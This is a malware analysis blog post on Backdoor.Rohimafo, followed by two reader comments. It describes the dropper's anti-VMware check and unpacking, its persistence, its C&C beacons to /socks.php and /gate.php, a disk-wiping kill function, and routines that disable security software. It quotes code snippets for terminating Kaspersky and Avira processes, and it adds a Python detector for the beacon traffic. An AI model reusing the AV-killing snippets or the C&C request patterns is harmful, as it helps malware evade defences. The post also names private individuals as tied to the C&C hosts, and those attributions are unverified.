Backdoor.Rohimafo
Today (despite our DDoSer “friend”) we’re going to analyze a new sample (md5: 2e7ea8b3d9cda626cdd8d6557952245d) that currently is 4/41 on virustotal.
Just two words on the packer:
- it checks whether a file named systemroot\system32\drivers\vmscsi.sys (the SCSI driver of VMware) exists and, if so, exits; ExpandEnvironmentStringsA is used to retrieve the path, followed by a call to GetFileAttributes.
- it adds 2 to the API function address before calling it, I guess to try to avoid simple hooks.
For those who want to unpack it:
- pass invalid-instruction and access-violation exceptions to the program
- break on ExpandEnvironmentStringsA (to skip all the initial garbage)
- if you are on VMware, remember to change the return value of GetFileAttributes
- after that it starts unpacking the original executable, which is scrambled and compressed with HipPack; wait until the second call to LocalFree. After the second one it will start to resolve imports and finally pass control to the OEP via a ret.
The unpacked executable checks whether it is already installed by opening the Atom “Mon Feb 1 07:05:52 2010”; if it is not, it installs itself into system32, appends its path to “software\microsoft\windows nt\currentversion\winlogon\userinit” and injects a DLL into svchost.exe after a call to RtlAdjustPrivilege.
The DLL calls home with the following request:
where A83B2824 is the bot ID and seller-15 seems to be the malware pusher’s ID ;)
In return you get this:
with some mirrors and a new friend to download and execute.
The new friend (md5: c7de49245194191869346e98448c90b4) is Backdoor.Rohimafo
The major features are:
- tries to kill some AVs (more on this later)
- a nasty !kill_os function that writes garbage to “\\.\PhysicalDrive” and systematically kills some key OS processes (lsass.exe, smss.exe, csrss.exe, …)
- injects itself into several programs (iexplorer.exe, firefox.exe, opera.exe, javaw.exe, javaws.exe, mnp.exe, isclient.exe, intpro.exe) to intercept network traffic and keystrokes
- opens a socket and dutifully notifies it to the C&C with something like this:
GET /socks.php?name=SYSTEM!COMPUTERNAME!A83B2824&port=10276
- it has the ability to add fake network routes to block communications to a predefined list of IPs
- it sends all the collected data back to the C&C via a POST to /gate.php
Some infection markers are a mutex named “{3097C089-C4F6-44a2-ADE2-83B4DE141A2A}” and, as for network signatures (besides the URLs), this: “——7d737a16804a6”, used as the multipart boundary when it sends the collected data back via a POST request.
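The two beacon shapes above (the /socks.php GET with user!host!botid and the /gate.php multipart POST) are easy to turn into a log-side detector. The following is an added example, not code from the post; the request lines are constructed, and because the page renders the boundary as a run of dashes before 7d737a16804a6 (the exact dash count is not recoverable), the matcher accepts any run of dashes in front of that hex tail.

```python
import re
from typing import Optional

# Constructed sample request lines (not captured traffic). The first two mirror
# the beacon shapes described in the write-up; the third is benign noise.
SAMPLE_REQUESTS = [
    "GET /socks.php?name=SYSTEM!COMPUTERNAME!A83B2824&port=10276 HTTP/1.1",
    "POST /gate.php HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=---------------------------7d737a16804a6\r\n",
    "GET /index.html HTTP/1.1",
]

# /socks.php?name=<user>!<hostname>!<botid>&port=<n>  (botid is hex on the page)
SOCKS_BEACON = re.compile(
    r"^GET /socks\.php\?name=([^!&\s]+)!([^!&\s]+)!([0-9A-Fa-f]+)&port=(\d+)"
)
# Assumption: any run of dashes followed by the hex tail seen on the page.
GATE_BOUNDARY = re.compile(r"boundary=-+7d737a16804a6\b")


def classify(request: str) -> Optional[dict]:
    """Return a dict describing a matched beacon, or None for non-matching traffic."""
    m = SOCKS_BEACON.match(request)
    if m:
        user, host, botid, port = m.groups()
        return {"kind": "socks_beacon", "user": user, "host": host,
                "botid": botid, "port": int(port)}
    if request.startswith("POST /gate.php") and GATE_BOUNDARY.search(request):
        return {"kind": "gate_upload"}
    return None


def scan(requests):
    """Run classify() over a list of request lines and keep the hits."""
    return [hit for hit in (classify(r) for r in requests) if hit is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit)
```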
As I said, it tries to kill four different antivirus products; I didn’t have time to confirm whether these routines work or not. Here they are:
- The first searches for a window whose name is set to “____AVP.Root” and then sends a message (466h, i.e. WM_USER+102) to it. This seems targeted at killing KIS; if you search for that string on Google you’ll land on several .cn blogs with this snippet:
kisHand:=FindWindow('____AVP.Root',nil); PostMessage(kisHand,WM_USER+102,1,1);
- Another one is targeted at Avira AV; it uses two functions from avipc.dll, AvIpcCall and AvIpcConnect, in this way:
AvIpcConnect("avguard01", 5000); AvIpcCall(avh, 0x2D, avmsg, 0xC, 0, 0, &out, 0);
- Now it’s the turn of the CA HIPS component (KmxAgent.sys): it opens “\\.\KmxAgent” and sends an IOCTL (code: 86000054h) with a buffer.
- The last one is AVG; it simply goes by brute force, overwriting avgtdix.sys with garbage and terminating avgtray.exe.
*I’m not including the specific buffers used for the attacks, if you are interested contact me directly
All the hosts (C&C) involved with these two malware samples are connected to the following well-known persons:
- VolgaHost / Bondarenko Dmitriy Vladimirovich
- ALFAHOSTNET / Romanov Artem Alekseevich
- COLO-NET / Volovik Elena Sergiyvna
2 Responses
Hi,
is this the correct md5? I got the file, but I can’t find the ExpandEnvironmentStrings API; the API at the entry point seems to be extract associated icon.
Yeah, my bad, the md5 is that of the VB dropper, not of the backdoor, which is: a09391ecff5353c255b0bc09c72d36ab